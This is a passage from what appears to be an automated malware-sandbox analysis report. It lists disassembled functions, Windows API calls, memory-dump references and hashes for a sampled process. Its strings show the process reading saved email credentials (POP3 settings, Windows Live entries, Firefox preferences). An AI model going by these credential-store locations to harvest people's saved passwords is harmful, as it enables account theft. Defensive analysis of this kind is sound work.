                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                  • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                  • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                  • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                  • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                  • strchr.MSVCRT ref: 0040327B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                  • API String ID: 1348940319-1729847305
                                                                                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                  • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                  • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                  • memset.MSVCRT ref: 0040FA1E
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                  • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                  • API String ID: 945165440-3589380929
                                                                                                                  • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                  • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                  • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                  • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                    • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                    • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                  • strchr.MSVCRT ref: 0040371F
                                                                                                                  • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                  • strlen.MSVCRT ref: 00403778
                                                                                                                  • sprintf.MSVCRT ref: 0040379C
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                  • String ID: %s@gmail.com
                                                                                                                  • API String ID: 3261640601-4097000612
                                                                                                                  • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                  • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004094C8
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                  • memset.MSVCRT ref: 0040950C
                                                                                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                  • _strcmpi.MSVCRT ref: 00409531
                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                  • API String ID: 3411445237-4169760276
                                                                                                                  • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                  • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                    • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                    • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                    • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$DialogMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2485852401-0
                                                                                                                  • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                  • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                  • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                  • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3642520215-0
                                                                                                                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                                  • memset.MSVCRT ref: 00405C3B
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                                  • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2313361498-0
                                                                                                                  • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                  • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                  • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                  • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2126104762-0
                                                                                                                  • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                  • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                  • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                  • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1999381814-0
                                                                                                                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                  • API String ID: 1297977491-3883738016
                                                                                                                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DAE3
                                                                                                                  • memset.MSVCRT ref: 0040DAF7
                                                                                                                  • memset.MSVCRT ref: 0040DB0B
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset$strlen$_memicmp
                                                                                                                  • String ID: user_pref("
                                                                                                                  • API String ID: 765841271-2487180061
                                                                                                                  • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                  • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                  • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                  • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                  • memset.MSVCRT ref: 004058C3
                                                                                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                  • SetFocus.USER32(?), ref: 00405976
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4281309102-0
                                                                                                                  • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                  • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                  • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                  • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                  • sprintf.MSVCRT ref: 0040A921
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                  • API String ID: 1631269929-4153097237
                                                                                                                  • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                  • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                  • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                  • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040810E
                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7618E430,?), ref: 004081B9
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                  • API String ID: 524865279-2190619648
                                                                                                                  • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                  • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00406B8E
                                                                                                                  • strlen.MSVCRT ref: 00406B99
